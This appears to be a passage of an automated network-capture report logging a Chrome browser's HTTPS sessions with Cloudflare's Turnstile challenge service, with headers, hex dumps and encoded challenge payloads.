                                                            2024-02-01 20:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.449757104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:16 UTC776OUTGET /cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PU HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:16 UTC208INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:16 GMT
                                                            Content-Type: image/png
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff41fd5eb16f-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:16 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 50 08 02 00 00 00 11 13 2b 26 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                            Data Ascii: 3dPNGIHDR%P+&IDAT$IENDB`
                                                            2024-02-01 20:38:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.449758104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:17 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/84ecff284c9c7bd8/1706819895334/ZNRieHZtFjh53PU HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:17 UTC208INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:17 GMT
                                                            Content-Type: image/png
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff47988312df-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:17 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 50 08 02 00 00 00 11 13 2b 26 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                            Data Ascii: 3dPNGIHDR%P+&IDAT$IENDB`
                                                            2024-02-01 20:38:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            22192.168.2.449759104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:18 UTC805OUTGET /cdn-cgi/challenge-platform/h/b/pat/84ecff284c9c7bd8/1706819895338/b81ae8d2fdf28c1e7dd5c58790b5061860f582aa9f45611c56e54c4cbacce485/lRi2J-abNJ11Sqg HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:18 UTC152INHTTP/1.1 401 Unauthorized
                                                            Date: Thu, 01 Feb 2024 20:38:18 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            2024-02-01 20:38:18 UTC1374INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 75 42 72 6f 30 76 33 79 6a 42 35 39 31 63 57 48 6b 4c 55 47 47 47 44 31 67 71 71 66 52 57 45 63 56 75 56 4d 54 4c 72 4d 35 49 55 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d 45 41 67
                                                            Data Ascii: www-authenticate: PrivateToken challenge=AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20guBro0v3yjB591cWHkLUGGGD1gqqfRWEcVuVMTLrM5IUAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=, token-key=MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQMEAg
                                                            2024-02-01 20:38:18 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                            Data Ascii: 1J
                                                            2024-02-01 20:38:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            23192.168.2.449760104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:18 UTC918OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 29214
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: 40a43fe0ff648d1
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:18 UTC16384OUTData Raw: 76 5f 38 34 65 63 66 66 32 38 34 63 39 63 37 62 64 38 3d 72 38 41 36 25 32 62 53 37 6c 66 31 66 4c 4e 42 54 53 53 24 63 24 6d 36 65 76 76 24 45 36 6e 34 37 4e 24 57 24 37 55 24 2d 77 24 35 24 4e 55 42 2d 37 39 24 56 35 24 37 66 34 37 46 24 46 47 41 34 31 5a 67 24 71 72 36 53 74 24 44 73 67 2d 34 6a 42 24 42 44 24 49 6b 73 66 24 69 68 46 41 53 6b 6f 24 42 4e 54 24 4c 31 24 55 53 55 68 24 72 4e 24 31 24 31 38 41 24 30 70 34 76 34 6d 68 24 37 38 37 65 24 6d 66 37 6f 24 49 47 6f 34 74 77 24 78 50 34 69 31 31 72 24 42 6d 24 31 63 46 46 24 58 30 72 71 5a 31 69 78 4f 76 24 58 50 76 4e 6b 41 59 24 53 5a 31 66 50 62 46 55 77 56 57 67 71 48 66 38 69 24 24 72 59 6f 41 24 34 6a 4c 6f 6c 66 34 44 31 42 57 6f 24 32 4e 76 54 32 49 24 71 59 32 6e 50 59 45 78 4a 30 68 53
                                                            Data Ascii: v_84ecff284c9c7bd8=r8A6%2bS7lf1fLNBTSS$c$m6evv$E6n47N$W$7U$-w$5$NUB-79$V5$7f47F$FGA41Zg$qr6St$Dsg-4jB$BD$Iksf$ihFASko$BNT$L1$USUh$rN$1$18A$0p4v4mh$787e$mf7o$IGo4tw$xP4i11r$Bm$1cFF$X0rqZ1ixOv$XPvNkAY$SZ1fPbFUwVWgqHf8i$$rYoA$4jLolf4D1BWo$2NvT2I$qY2nPYExJ0hS
                                                            2024-02-01 20:38:18 UTC12830OUTData Raw: 48 66 42 55 53 24 42 36 4c 41 37 50 24 2d 4e 41 41 42 36 37 55 24 41 37 6e 24 37 55 6d 65 68 46 24 38 67 6d 55 37 5a 59 73 24 42 55 53 53 24 41 36 41 4e 2b 59 24 4b 36 41 66 4c 7a 36 41 24 69 66 37 6e 24 6b 36 31 24 4c 6c 34 4c 36 53 24 37 70 24 48 36 4c 4e 37 75 24 6e 24 56 77 4c 56 52 43 58 46 24 4c 38 44 66 36 78 55 4c 6f 24 53 24 42 6a 37 44 55 4e 6c 4c 47 24 36 24 6a 34 72 44 37 49 24 4a 50 69 70 37 2d 24 6f 38 72 34 24 4e 24 76 52 72 38 37 2d 24 31 44 37 36 37 49 24 67 58 78 34 53 56 34 79 24 5a 34 58 50 37 61 24 65 41 53 6d 37 63 24 65 61 53 2d 37 48 66 58 66 24 6c 37 56 24 71 55 31 75 50 51 24 61 44 53 4b 37 34 36 59 55 78 59 24 45 24 65 55 42 6c 37 7a 24 61 34 78 50 37 2d 36 4e 41 31 6d 37 53 36 4f 55 42 76 37 77 36 5a 41 31 2d 24 6a 34 49 41 53
                                                            Data Ascii: HfBUS$B6LA7P$-NAAB67U$A7n$7UmehF$8gmU7ZYs$BUSS$A6AN+Y$K6AfLz6A$if7n$k61$Ll4L6S$7p$H6LN7u$n$VwLVRCXF$L8Df6xULo$S$Bj7DUNlLG$6$j4rD7I$JPip7-$o8r4$N$vRr87-$1D767I$gXx4SV4y$Z4XP7a$eASm7c$eaS-7HfXf$l7V$qU1uPQ$aDSK746YUxY$E$eUBl7z$a4xP7-6NA1m7S6OUBv7w6ZA1-$j4IAS
                                                            2024-02-01 20:38:19 UTC327INHTTP/1.1 200 OK
                                                            Date: Thu, 01 Feb 2024 20:38:19 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-chl-gen: SfqfPIFSoDZv1Ct9yMHF+riMDv7iWkOwrjxfbio+tcE2RDD2ivRJ3fFfDZD5Wsct$Sd1Hovzl1Ru4vEy5Cfh8gg==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff50c89b677d-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:19 UTC1042INData Raw: 34 61 37 30 0d 0a 66 62 62 43 76 4c 36 78 74 4a 71 4a 75 70 6d 49 6a 73 2b 2b 6a 36 4b 2f 76 36 50 58 30 39 4f 57 6d 70 33 54 33 39 53 64 34 4c 44 44 77 75 48 58 75 63 50 63 35 37 33 48 34 4b 62 47 75 38 36 72 79 38 48 41 77 73 72 61 31 4e 6e 75 36 76 76 63 75 37 4f 2f 2f 76 33 37 38 2f 6a 45 39 65 51 4a 42 41 6a 59 34 67 6e 35 7a 65 44 4b 38 67 67 59 79 75 2f 58 2b 52 54 75 39 43 45 58 38 69 4d 57 47 52 30 42 41 39 2f 7a 39 4f 63 71 36 79 77 45 4d 76 45 30 43 79 7a 31 41 44 59 68 4c 76 58 37 43 79 7a 31 4c 42 30 39 44 45 45 74 4a 52 63 62 46 44 68 4a 4f 78 38 58 44 6a 38 68 47 79 41 74 44 43 51 54 55 6b 4a 4c 4c 31 63 76 58 69 74 59 50 45 77 30 4e 46 41 2f 55 45 6b 6f 53 6b 42 48 4b 32 56 51 53 47 52 6a 5a 53 70 4f 55 6d 70 55 56 56 59 33 55 31 70 4e 66
                                                            Data Ascii: 4a70fbbCvL6xtJqJupmIjs++j6K/v6PX09OWmp3T39Sd4LDDwuHXucPc573H4KbGu86ry8HAwsra1Nnu6vvcu7O//v378/jE9eQJBAjY4gn5zeDK8ggYyu/X+RTu9CEX8iMWGR0BA9/z9Ocq6ywEMvE0Cyz1ADYhLvX7Cyz1LB09DEEtJRcbFDhJOx8XDj8hGyAtDCQTUkJLL1cvXitYPEw0NFA/UEkoSkBHK2VQSGRjZSpOUmpUVVY3U1pNf
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 69 49 6d 72 72 38 36 64 78 36 76 42 6a 39 4b 53 75 64 4f 61 71 74 6a 53 33 4a 75 79 78 5a 2b 7a 30 4e 48 55 75 37 62 74 79 36 48 68 33 73 37 68 77 2b 79 6f 78 74 4c 4a 32 38 62 77 7a 39 76 57 41 76 50 43 34 76 6a 53 37 75 4c 78 41 4d 48 61 78 38 77 4c 31 77 54 51 79 65 33 74 35 68 63 52 2b 64 67 4a 42 74 54 38 45 68 30 51 30 79 51 66 44 64 73 41 34 50 6b 66 46 2b 63 59 4c 78 2f 6f 4c 51 45 54 4b 77 45 7a 4b 7a 63 4a 4d 42 67 56 50 44 34 4b 46 43 34 63 51 45 49 2f 41 52 41 7a 45 6b 52 4d 48 55 45 4b 51 6b 41 5a 43 69 49 79 52 69 34 34 55 53 38 6c 56 45 6c 4c 57 42 39 4f 4b 56 67 5a 51 46 63 79 51 46 63 79 4e 7a 5a 42 59 56 39 68 63 57 70 41 50 54 51 77 64 48 4e 73 54 45 56 49 53 57 30 31 4f 47 41 2f 67 34 4a 30 5a 44 68 35 4f 6a 39 5a 68 6f 78 2f 53 58 74
                                                            Data Ascii: iImrr86dx6vBj9KSudOaqtjS3JuyxZ+z0NHUu7bty6Hh3s7hw+yoxtLJ28bwz9vWAvPC4vjS7uLxAMHax8wL1wTQye3t5hcR+dgJBtT8Eh0Q0yQfDdsA4PkfF+cYLx/oLQETKwEzKzcJMBgVPD4KFC4cQEI/ARAzEkRMHUEKQkAZCiIyRi44US8lVElLWB9OKVgZQFcyQFcyNzZBYV9hcWpAPTQwdHNsTEVISW01OGA/g4J0ZDh5Oj9Zhox/SXt
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 5a 4b 71 6f 74 4f 6b 72 5a 72 63 73 37 37 4e 74 37 36 66 31 4c 36 68 73 4e 54 66 32 74 6e 41 71 61 2f 72 33 37 4c 4a 73 4e 43 31 74 37 62 4e 78 50 58 37 76 4e 2f 50 38 39 37 39 37 37 34 42 2f 66 44 42 77 64 62 64 41 76 72 6f 35 41 33 6a 33 4f 63 54 34 50 62 34 45 78 48 55 36 68 6a 36 31 39 67 64 37 41 77 5a 39 64 34 43 38 42 58 62 4b 78 55 4e 49 76 6e 70 44 4f 38 79 37 43 63 7a 43 69 4d 6f 37 78 73 70 4b 41 30 65 39 69 4a 43 2b 45 41 2f 48 55 4d 53 48 44 34 72 4e 78 35 4a 48 30 45 76 49 30 30 4b 48 55 55 34 4c 54 42 56 4f 78 49 30 47 53 31 61 4d 6a 77 38 57 46 77 34 51 69 51 6f 49 30 64 45 48 31 68 73 59 6e 49 36 50 6e 52 6f 61 6d 5a 51 52 6c 68 6e 4d 6a 56 54 58 46 71 42 54 6a 35 61 55 49 42 43 64 33 71 46 57 32 52 5a 57 31 35 6b 68 6c 78 68 66 57 39 49
                                                            Data Ascii: ZKqotOkrZrcs77Nt76f1L6hsNTf2tnAqa/r37LJsNC1t7bNxPX7vN/P8979774B/fDBwdbdAvro5A3j3OcT4Pb4ExHU6hj619gd7AwZ9d4C8BXbKxUNIvnpDO8y7CczCiMo7xspKA0e9iJC+EA/HUMSHD4rNx5JH0EvI00KHUU4LTBVOxI0GS1aMjw8WFw4QiQoI0dEH1hsYnI6PnRoamZQRlhnMjVTXFqBTj5aUIBCd3qFW2RZW15khlxhfW9I
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 36 38 76 73 2b 59 75 39 54 4d 77 4b 54 46 79 65 72 66 6e 65 4f 33 71 76 44 44 37 63 58 43 36 4c 58 68 37 63 36 31 38 76 58 52 30 66 44 76 37 65 4c 65 34 2f 6e 37 33 51 62 54 77 66 37 66 79 77 33 39 35 66 72 52 37 75 58 55 30 75 58 6d 46 51 38 54 44 78 4d 4f 2b 39 77 64 48 41 76 2b 46 67 58 75 47 52 63 6c 47 78 2f 33 37 4f 6f 48 36 44 45 49 45 75 7a 74 46 52 63 79 4d 50 63 55 39 7a 51 36 45 79 30 7a 4d 52 77 57 42 6a 77 53 53 6a 70 4b 41 68 6f 68 44 77 4a 50 4b 44 31 49 54 44 51 73 54 45 38 4d 50 46 41 38 58 56 70 4d 4e 6a 74 62 4a 46 55 2b 4f 42 39 45 61 54 63 6c 57 43 41 74 4f 33 4a 4d 4b 7a 78 44 58 32 34 32 4c 32 5a 54 62 58 56 4d 59 48 46 34 66 6c 68 31 5a 45 35 59 56 56 78 37 52 58 35 45 56 6b 78 70 58 6d 4e 2b 62 34 69 52 61 58 64 32 61 33 74 35 56
                                                            Data Ascii: 68vs+Yu9TMwKTFyerfneO3qvDD7cXC6LXh7c618vXR0fDv7eLe4/n73QbTwf7fyw395frR7uXU0uXmFQ8TDxMO+9wdHAv+FgXuGRclGx/37OoH6DEIEuztFRcyMPcU9zQ6Ey0zMRwWBjwSSjpKAhohDwJPKD1ITDQsTE8MPFA8XVpMNjtbJFU+OB9EaTclWCAtO3JMKzxDX242L2ZTbXVMYHF4flh1ZE5YVVx7RX5EVkxpXmN+b4iRaXd2a3t5V
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 57 6f 35 79 6c 77 4d 6d 35 74 4d 50 68 36 36 36 6d 78 63 47 38 7a 4d 53 32 71 62 57 76 75 66 62 54 79 4c 76 33 31 4e 44 52 2f 50 77 43 76 63 54 47 34 4e 6b 46 33 67 62 75 43 66 6e 36 34 51 6a 6d 46 68 59 53 46 64 44 6f 30 51 73 4c 47 4f 67 4f 33 74 34 64 32 69 50 6b 37 39 6f 6e 36 76 51 44 36 2b 54 74 47 67 30 78 35 53 30 6e 41 44 66 31 39 6a 51 33 45 7a 70 41 50 2f 31 43 4f 7a 67 58 2f 67 42 48 42 54 70 46 52 6a 59 68 53 68 6c 50 50 42 77 52 55 7a 45 4a 56 45 45 51 47 51 35 62 50 69 34 65 58 56 59 61 49 7a 78 65 58 57 5a 54 56 6d 64 6b 4b 30 6c 6f 61 6a 42 65 62 57 78 73 5a 6e 4a 7a 63 32 5a 62 64 56 42 4d 66 7a 35 5a 56 6c 4e 42 67 33 42 53 52 30 5a 41 53 54 36 4c 5a 59 68 59 52 30 39 50 58 59 4f 44 56 31 57 58 69 47 64 61 6d 56 79 57 6d 33 68 74 59 4a
                                                            Data Ascii: Wo5ylwMm5tMPh666mxcG8zMS2qbWvufbTyLv31NDR/PwCvcTG4NkF3gbuCfn64QjmFhYSFdDo0QsLGOgO3t4d2iPk79on6vQD6+TtGg0x5S0nADf19jQ3EzpAP/1COzgX/gBHBTpFRjYhShlPPBwRUzEJVEEQGQ5bPi4eXVYaIzxeXWZTVmdkK0loajBebWxsZnJzc2ZbdVBMfz5ZVlNBg3BSR0ZAST6LZYhYR09PXYODV1WXiGdamVyWm3htYJ
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 6f 63 54 62 75 72 6a 49 30 4f 6d 38 38 62 4f 32 76 2f 62 4e 78 63 54 71 32 63 6a 49 2f 50 50 52 7a 50 4c 64 30 74 44 67 38 39 58 56 31 4e 33 62 7a 4f 6a 37 32 39 73 44 37 4d 6a 66 42 2b 33 6e 35 65 54 34 46 75 67 66 2b 66 4c 73 2f 50 54 6d 37 79 62 6b 2b 66 51 70 49 50 33 6c 43 52 77 41 2f 66 77 53 42 67 41 52 47 67 6e 34 46 53 77 4f 43 44 37 38 44 77 34 4e 4a 51 63 52 49 53 6c 43 46 68 55 38 47 42 67 2f 4b 68 34 63 4c 53 34 6a 49 56 56 4d 4b 79 52 4c 50 69 6f 70 4f 54 59 74 47 6a 31 47 4d 79 56 42 57 44 59 31 52 55 6f 2f 4f 46 39 66 4d 7a 31 4e 52 57 35 41 55 56 6b 74 52 46 56 4f 53 30 6c 2b 50 56 41 36 67 58 68 57 55 56 46 61 56 46 57 4c 66 46 39 59 61 57 47 4b 58 47 32 45 5a 47 47 58 68 47 64 6c 5a 59 78 6f 58 58 6c 79 63 47 78 62 59 58 42 65 67 58 35
                                                            Data Ascii: ocTburjI0Om88bO2v/bNxcTq2cjI/PPRzPLd0tDg89XV1N3bzOj729sD7MjfB+3n5eT4Fugf+fLs/PTm7ybk+fQpIP3lCRwA/fwSBgARGgn4FSwOCD78Dw4NJQcRISlCFhU8GBg/Kh4cLS4jIVVMKyRLPiopOTYtGj1GMyVBWDY1RUo/OF9fMz1NRW5AUVktRFVOS0l+PVA6gXhWUVFaVFWLfF9YaWGKXG2EZGGXhGdlZYxoXXlycGxbYXBegX5
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 63 6d 6c 36 2b 62 74 36 4b 37 78 74 62 6e 63 73 2f 58 49 73 72 37 72 41 4e 71 2b 33 63 54 67 36 64 72 4a 42 41 72 4a 7a 66 44 48 43 74 77 54 41 78 50 55 2b 41 2f 58 46 38 37 57 39 64 77 43 38 43 51 57 48 43 4d 69 47 69 59 41 43 79 44 6f 2f 44 41 6b 42 2b 38 76 38 42 58 72 38 79 6b 31 4c 68 48 74 4d 2f 63 32 4d 53 34 36 48 77 45 6d 49 51 52 44 2b 67 4d 6d 43 53 34 5a 53 77 30 79 4b 52 42 47 55 55 6f 78 43 6c 41 70 55 6b 35 4b 56 6a 38 64 51 6c 4d 67 58 78 63 66 50 79 56 4a 58 32 64 6f 5a 31 35 64 4f 56 4a 72 4d 47 38 6e 4c 31 63 31 59 32 70 70 52 56 35 33 65 7a 31 72 63 6e 46 4e 66 48 39 45 67 7a 74 44 5a 45 6c 33 66 6e 31 5a 69 49 75 50 55 58 2b 47 68 57 46 56 6b 31 69 58 54 31 64 35 58 59 75 53 6b 57 31 68 6e 36 4e 6c 6b 35 71 5a 64 6e 36 6e 62 4b 74 6a
                                                            Data Ascii: cml6+bt6K7xtbncs/XIsr7rANq+3cTg6drJBArJzfDHCtwTAxPU+A/XF87W9dwC8CQWHCMiGiYACyDo/DAkB+8v8BXr8yk1LhHtM/c2MS46HwEmIQRD+gMmCS4ZSw0yKRBGUUoxClApUk5KVj8dQlMgXxcfPyVJX2doZ15dOVJrMG8nL1c1Y2ppRV53ez1rcnFNfH9EgztDZEl3fn1ZiIuPUX+GhWFVk1iXT1d5XYuSkW1hn6Nlk5qZdn6nbKtj
                                                            2024-02-01 20:38:19 UTC1369INData Raw: 4c 44 74 38 50 51 30 50 66 2b 36 75 33 38 2f 74 6a 78 42 77 6a 63 2b 73 63 4b 2b 41 50 62 43 65 51 44 32 77 51 4f 36 4f 59 59 36 77 4c 52 46 68 6e 58 36 4e 30 61 47 74 38 67 48 68 38 69 35 53 62 6c 42 52 38 41 4c 43 66 76 35 2b 77 78 45 52 41 78 4a 41 6e 31 4e 2f 6b 5a 4b 76 66 38 39 66 30 4d 4e 44 6b 56 2b 7a 67 57 51 69 51 45 52 41 30 64 50 31 45 38 49 44 30 4f 42 7a 38 79 46 46 52 4c 55 52 51 64 48 44 77 58 50 31 59 68 4c 7a 55 32 54 7a 6b 69 58 43 55 2b 59 57 59 33 54 7a 35 41 4b 6b 39 41 63 6b 31 57 4d 30 5a 76 56 6e 6c 37 65 6a 31 72 55 47 35 30 66 57 65 44 56 49 70 2f 56 30 70 31 52 58 39 69 57 32 74 4d 66 32 52 66 6b 48 42 70 6d 4a 4a 76 6e 6f 32 50 66 31 69 5a 6d 49 4b 43 5a 6e 75 49 68 57 65 70 72 59 57 44 62 49 56 78 6e 6e 75 67 71 62 43 51 67
                                                            Data Ascii: LDt8PQ0Pf+6u38/tjxBwjc+scK+APbCeQD2wQO6OYY6wLRFhnX6N0aGt8gHh8i5SblBR8ALCfv5+wxERAxJAn1N/kZKvf89f0MNDkV+zgWQiQERA0dP1E8ID0OBz8yFFRLURQdHDwXP1YhLzU2TzkiXCU+YWY3Tz5AKk9Ack1WM0ZvVnl7ej1rUG50fWeDVIp/V0p1RX9iW2tMf2RfkHBpmJJvno2Pf1iZmIKCZnuIhWeprYWDbIVxnnugqbCQg


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            24192.168.2.449761104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:19 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2024-02-01 20:38:19 UTC386INHTTP/1.1 400 Bad Request
                                                            Date: Thu, 01 Feb 2024 20:38:19 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: AwZxP9ZxiJ8wQTFLnLXWiA==$/CZMa/efbfVHCSWHlHF9Xg==
                                                            Server: cloudflare
                                                            CF-RAY: 84ecff557f290705-ATL
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-02-01 20:38:19 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                            Data Ascii: 7invalid
                                                            2024-02-01 20:38:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.449767104.17.3.1844433260C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-02-01 20:38:37 UTC918OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1724395763:1706818044:48Oktt0s5MTU6dFdGgTX_IFhJzDfI-CAztyQWs6jl5M/84ecff284c9c7bd8/40a43fe0ff648d1 HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 29882
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: 40a43fe0ff648d1
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/xprvk/0x4AAAAAAADnPIDROrmt1Wwj/light/normal
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
